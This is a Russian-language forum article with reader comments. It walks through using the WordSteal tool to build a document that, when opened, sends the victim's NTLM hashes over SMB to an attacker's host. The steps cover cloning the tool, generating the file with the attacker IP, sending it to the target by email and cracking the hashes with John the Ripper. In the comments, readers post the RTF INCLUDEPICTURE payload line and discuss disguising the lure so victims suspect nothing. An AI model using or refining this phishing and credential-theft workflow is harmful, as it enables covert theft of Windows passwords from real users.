Статья WordSteal - Похищаем пароли Windows

Привет! В этой статье мы поговорим как, в принципе, легко и без хлопот заполучить учетные данные пользователя Windows системы.

Для этого предлагаю использовать инструмент, Word Steal который, замечательно с этим справляется.

upload_2017-4-8_0-19-47.png


Этот скрипт создаст POC, который в свою очередь предоставит нам хэши NTLM (NTLM (NT LAN Manager) — является протоколом сетевой аутентификации, разработанным фирмой Microsoft для Windows NT.) с удаленного компьютера. Данные мы будем получать по протоколу SMB, сгенерированный вредоносный файл не кажется таковым с точки зрения рядового пользователя. Итак, приступим, для начала скачиваем Word Steal с репозиториев git.

Атакующая сторона – Kali Linux 2016.2 Rolling.

> git clone https://github.com/0x090x0/WordSteal

upload_2017-4-8_0-21-8.png


Затем дадим права на исполнение файлу main.py.

> cd WordSteal

> ls –a

> chmod +x main.py

upload_2017-4-8_0-21-47.png


Скачаем любую картинку в формате .jpeg и поместим ее в папку с Word Steal.

upload_2017-4-8_0-23-44.png


Теперь приступим к созданию главного файла, запускаем программу с такими параметрами:

> python main.py 172.16.0.151 (Это адрес атакующего хоста) i.jpeg 1

upload_2017-4-8_0-24-20.png


После окончания работы сценария в папке с Word Steal образуется такой файл:

upload_2017-4-8_0-24-54.png


Его необходимо доставить на целевой хост, для этого идеально подходит почта, отправляем:

upload_2017-4-8_0-25-41.png


Сохраняем файл на целевом хосте и открываем, теперь вернемся к консоли линукс и посмотрим, что происходит там:

upload_2017-4-8_0-26-8.png


На скриншоте видно, что соединение установилось, и мы получили хэши паролей, в папке с Word Steal появился файлик:

upload_2017-4-8_0-26-35.png


Это файл с хэшами, пароли из них будем восстанавливать с помощью john the ripper:

> john passwords_netntlmv2

upload_2017-4-8_0-27-28.png


Как видно, ему удалось восстановить мой пароль, но это лишь в том случае если он есть в базе (словаре) если бы я его туда не добавил, то вероятно ничего бы не произошло.

В общем, как-то так, на этом все, спасибо за внимание.
 

Вложения

  • upload_2017-4-8_0-22-28.png
    upload_2017-4-8_0-22-28.png
    11,8 КБ · Просмотры: 375
D

Dmitry88

Спасибо за отличную тулзу. Win 7 sp1 работает. Вытаскивает как локальный , так и доменный пароль. Обработался не только MS word но и open office 4.
Вопрос к автору:
Как сделать файл более правдоподобным?
В базовом вариант там просто пустой квадрат с сылкой на картинку.
Я пропробовал добавить пейлоад в готовый документ, сработало, но видно мусор и пустой квадрат. Может его изображением поверх перекрыть ?
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Можно попробовать, или уже в готовый импортировать какие-то данные, будь то таблицы или графики...
 
  • Нравится
Реакции: LightSmoke
D

Dmitry88

Можно попробовать, или уже в готовый импортировать какие-то данные, будь то таблицы или графики...
Получилось в готовый импортировать строку:
{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://127.0.0.1/kitty.jpeg" \\* MERGEFORMAT\\d}}{\fldrslt}}}
Пустой квадрат по формату изображения. Можно еще попробовать маленьку картинку взять. Эдак 10х10 пикселей. И засунуть подальше в документ. Либо перекрыть ее сверху легальной картинкой.
 
  • Нравится
Реакции: Vander
I

Inject0r

мне интересно какая уязвимость здесь используется. Антивирусами не палится, макросы тоже не задействованы.
 

Петручо

Green Team
27.11.2016
115
12
BIT
1
Вытаскивает как локальный , так и доменный пароль

то есть вытакивает хэши даже из под юзера ?
 
D

Dmitry88

Вытаскивает как локальный , так и доменный пароль

то есть вытакивает хэши даже из под юзера ?
Да. Вытаскивает хэш текущего залогиненного пользователя.

мне интересно какая уязвимость здесь используется. Антивирусами не палится, макросы тоже не задействованы.
Особенность работы smb протокола.
 
J

Juice

Имхо, краткое описание технологии , насколько я понимаю.
 
  • Нравится
Реакции: Dmitry88 и Vander

MARUN

New member
23.08.2020
1
0
BIT
0
Делаю все тоже самое,но когда пишу cd WordSteal пишет это не директория
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!